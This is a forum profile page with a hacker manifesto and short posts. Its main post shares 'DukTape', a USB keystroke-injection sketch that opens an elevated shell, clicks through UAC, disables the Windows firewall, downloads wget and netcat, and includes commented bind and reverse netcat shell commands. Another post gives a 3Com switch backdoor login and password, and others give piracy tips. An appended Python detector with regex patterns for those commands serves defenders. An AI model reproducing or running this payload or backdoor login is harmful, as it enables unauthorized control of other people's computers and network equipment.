str33ts0ld13r

Profile Information

  • Gender
    Male
  • Interests
    This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.


  1. Greetings ducky lovers! I'm very excited to finally be making a contribution to the rubber ducky project. To get started you will need arduino and the phukdlib. DukTape is nothing fancy (pun intended). It will get you wget and a few other toys like nc, then it opens a back door for you to get in. When complete it blinks (big surprise right!! haha). There is MUCH room for improvement on this but I sadly haven't had time to work on this as much as I would like. Anyway, I wanted to share what I have put together so far. Please feel free to modify, add, change whatever you like in this code. All that I ask is that you post your changes for the rest of the ducky community. As always, constructive criticism is welcome and appreciated.

     Warning: I have NOT had a chance to test this code with my teensy yet (had some hardware failure on my test boxes :( ). But it compiles fine for me.

     Warning2: I haven't set up a kill switch feature yet to keep it from running on systems you don't want it to (i.e. your own system). So you have been warned, it runs every time you plug it in!

     UPDATE: I just added a UAC handler and changed the way the cmd is launched to go through the start menu using ctrl and esc keys. (thanks H@L0_F00 for the ctrl esc combo you posted) and (thanks Jonny_Walked I used some of the code you posted, UAC handler, and used your cmd launcher) (If this code was Benownzu93's I thank you). Also the PHUCKED lib is no longer needed with the updated cmd launcher.

         /*
         ################################
         ###########DukTape##############
         ################################
         Readme:
         To use DukTape make sure you have the phukdlib installed in arduino.
         I would like to thank everyone on the Rubber Ducky forums
         http://www.hak5.org/forums/index.php?showforum=56
         who I borrowed ideas and code from.
         Debug is done through the serial monitor. To disable it comment out/remove
         the code marked as debug (ie.. //debug).
         Delays may need to be adjusted...
         */
         int ledPin = 11;

         void setup() {
           delay(5000); //initial delay
           pinMode(ledPin, OUTPUT);
           Serial.begin(9600); //debug
           delay(200); //debug
           Serial.println("START");//debug
           //start cmd hidden
           CMD();
           delay(1000);
           MoveWin();
           //prepare work area
           TypeCmd("mkdir %systemroot%\\winduk");
           TypeCmd("cd %systemroot%\\winduk");
           TypeCmd("netsh firewall set opmode disable");//kill firewall
           //ftp download wget
           TypeCmd("echo bin >>ftpcmd.txt");
           TypeCmd("echo cd /tex-archive/systems/texlive/tlnet/tlpkg/installer/wget/ >>ftpcmd.txt");
           TypeCmd("echo get wget.exe >>ftpcmd.txt");
           TypeCmd("echo quit >>ftpcmd.txt");
           TypeCmd("ftp -A -v -s:ftpcmd.txt cam.ctan.org"); //run ftp download
           delay(6000);
           TypeCmd("if NOT exist wget.exe ftp -A -v -s:ftpcmd.txt cam.ctan.org");//error recovery in case of wget download fail
           Serial.println("Ftp completed");//debug
           //Get more tools
           TypeCmd("if NOT exist unzip.exe wget -q http://stahlworks.com/dev/unzip.exe"); //get unzip
           TypeCmd("if NOT exist nircmd.zip wget -q http://www.nirsoft.net/utils/nircmd.zip");//get nircmd
           TypeCmd("if NOT exist nircmdc.exe unzip.exe -qq nircmd.zip"); //unzip nircmd
           TypeCmd("if NOT exist nc111nt.zip wget -q http://joncraton.org/media/files/nc111nt.zip"); //get netcat
           TypeCmd("if NOT exist nc.exe unzip.exe -qq nc111nt.zip nc.exe");//unzip netcat
           //Payload
           //TypeCmd("nc -l -p 1337 -d -e cmd.exe");//netcat listens on port leet and launches cmd when a connection is established
           /*TypeCmd("nc -d IP PORT -e cmd.exe");/*reverse netcat replace IP with your ipaddress and replace PORT with the port you use on the system you want to connect back to, run "nc -l -p PORT" without the quotes on your system to accept the reverse connection*/
           //clean up
           TypeCmd("if Exist nircmdc.exe del /Q nircmd.zip");
           TypeCmd("if EXIST ftpcmd.txt del /Q ftpcmd.txt");
           TypeCmd("if EXIST nc111nt.zip del /Q nc111nt.zip");
           TypeCmd("exit");//close cmd.
           Serial.println("ALL DONE!");//debug
         }

         void loop() {
           digitalWrite(ledPin, HIGH);// LED on
           delay(500);
           digitalWrite(ledPin, LOW);// LED off
           delay(500);
         }

         void Enter() {
           Keyboard.set_key1(KEY_ENTER);
           Keyboard.send_now();
           Keyboard.set_key1(0);
           Keyboard.send_now();
           delay(100);
         }

         void TypeCmd(char *commandtotype) { //must have cmd prompt open to work
           Keyboard.println("*commandtotype");
           delay(200);
           Enter();
           delay(2000);//Execution delay
           Serial.println("*commandtotype");//debug
         }

         void MoveWin() {
           Keyboard.set_modifier(MODIFIERKEY_ALT);
           Keyboard.set_key1(KEY_SPACE);
           Keyboard.set_key2(KEY_M);
           Keyboard.send_now();
           delay(50);
           Keyboard.set_modifier(0);
           Keyboard.set_key1(0);
           Keyboard.set_key2(0);
           Keyboard.send_now();
           delay(50);
           for(int x=0; x<200; ++x){
             Keyboard.set_key1(KEY_UP);
             Keyboard.send_now();
             Keyboard.set_key1(0);
             Keyboard.send_now();
             delay(100);
           }
           Enter();
         }

         void UAC() {
           Keyboard.set_modifier(MODIFIERKEY_ALT);
           Keyboard.set_key1(KEY_Y);
           Keyboard.send_now();
           delay(100);
           Keyboard.set_modifier(0);
           Keyboard.set_key1(0);
           Keyboard.send_now();
         }

         void CMD() {
           Keyboard.set_modifier(MODIFIERKEY_CTRL);
           Keyboard.set_key1(KEY_ESC);
           Keyboard.send_now();
           Keyboard.set_modifier(0);
           Keyboard.set_key1(0);
           Keyboard.send_now();
           Keyboard.print("cmd");
           delay(1000);
           Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
           Keyboard.set_key1(KEY_ENTER);
           Keyboard.send_now();
           Keyboard.set_modifier(0);
           Keyboard.set_key1(0);
           Keyboard.send_now();
           delay(2000);
           UAC();
         }
  2. I want to give a huge thanks to Darren for the ducky kit!! mine showed up today. The mail actually delivered it to the next street over but the guy that lives there brought it over! maybe I should head to the casino with luck like this
  3. Got signed up, been waiting about 10 hours for this lol. Hope I make the cut, and didn't stay up for 24 hours for nothing lol. Good luck to everyone else too. I'm really happy to see so much support for this so quickly!! Now it's time to take a nap..
  4. that's a sweet setup. especially the dual WAN.. however i don't think that the tucked away to look normal concept really works (it's ok though i still tuck mine away to look normal too, although it really doesn't work for me either lol).
  5. that's sweet man. i've been playing with it in a VM for a few hours. i haven't had any problems with it. a few suggestions i could make would be to add Cain & Abel (i know it's a tool that is looked down upon but there is no denying that it does have a lot of useful features) maybe wireshark. i like how the UI is real simple and not cluttered with things that you don't need. i'm really looking forward to the future releases! if i can help with anything pm me.
  6. hell they don't need to put cameras or mics in anyone's house we all put them there for them. ie cell phone regular phone web cam plus there are the billions of security / traffic cams they have.. they can tap everything anyway....
  7. damn i hate being broke.. i always like picking up new equipment...
  8. or you can always go with game name filetype:torrent in a google search. makes things real nice and fast.
  9. you can just get a free shell account from somewhere that allows ssh (most do) and tunnel through that. what i use for my tunnels is my hp server LC2000 (i know it's ancient but it works for me plus it was free). you always do have the option of just taking one of the junk computers you probably have laying around and putting linux on it. ubuntu is really really easy to set up, then just connect it to your network and run it headless. that's usually a cheap way. if you don't have a crapo machine laying around, garage sales are usually a good place to find one.
  10. so are we going to get back on topic or what people?
  11. where the hell is this thing legal for free. i ran tor through like 30 different countries and the best i could find is access to the premium one....
  12. all very good videos i've had them for quite a while and watch them regularly.
  13. starchfish: for the 3com firmware 7.0.1 and 8.1.1 (you should be able to get the firmware here if you don't have it infodeli.3com.com) there is a back door login of debug with the password synnet just telnet in. it's a major security flaw that they put in that you should probably fix once you get your switches back up..
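
For defenders: the commands the DukTape sketch in post 1 types into cmd.exe show up as process-creation records on the host. The following is an added example, not code from the original posts, that correlates those records per host. The event tuple layout, rule names, time window and threshold are assumptions, and the firewall rule covers only the legacy `netsh firewall` syntax quoted in the post.

```python
import re
from datetime import datetime, timedelta

# Patterns derived from the commands quoted in post 1; rule names are hypothetical.
RULES = {
    "firewall_disabled": re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I),
    "scripted_ftp": re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I),
    "netcat_exec": re.compile(r"\bnc(\.exe)?\b.*\s-e\s+cmd(\.exe)?", re.I),
    "staging_dir": re.compile(r"\\winduk\\", re.I),
}
WINDOW = timedelta(minutes=5)  # assumption: the typed sequence completes within minutes
THRESHOLD = 2                  # distinct rules on one host before alerting

def match_rules(image, cmdline):
    """Return the names of all rules matching the image path or command line."""
    text = image + " " + cmdline
    return {name for name, rx in RULES.items() if rx.search(text)}

def detect(events):
    """events: iterable of (iso_timestamp, host, image_path, command_line).
    Returns [(host, first_hit_timestamp, sorted_rule_names)] for each host where
    at least THRESHOLD distinct rules fire within WINDOW of one another."""
    hits = {}
    for ts, host, image, cmd in events:
        for rule in match_rules(image, cmd):
            hits.setdefault(host, []).append((datetime.fromisoformat(ts), rule))
    alerts = []
    for host, seen in sorted(hits.items()):
        seen.sort()
        for i, (start, _) in enumerate(seen):
            rules = {r for t, r in seen[i:] if t - start <= WINDOW}
            if len(rules) >= THRESHOLD:
                alerts.append((host, start.isoformat(), sorted(rules)))
                break
    return alerts

# Constructed sample process-creation records (not real telemetry).
SAMPLE = [
    ("2024-01-01T10:00:09", "ws-01", r"C:\Windows\System32\netsh.exe", "netsh firewall set opmode disable"),
    ("2024-01-01T10:00:20", "ws-01", r"C:\Windows\System32\ftp.exe", "ftp -A -v -s:ftpcmd.txt cam.ctan.org"),
    ("2024-01-01T10:01:10", "ws-01", r"C:\Windows\winduk\nc.exe", "nc -l -p 1337 -d -e cmd.exe"),
    ("2024-01-01T11:00:00", "ws-02", r"C:\Windows\System32\ftp.exe", "ftp -s:nightly.txt backup.example.internal"),
    ("2024-01-01T09:00:00", "ws-03", r"C:\Windows\System32\netsh.exe", "netsh firewall show state"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

A single scripted FTP job (ws-02) or a read-only netsh query (ws-03) stays below the threshold; only the combination seen on ws-01 raises an alert.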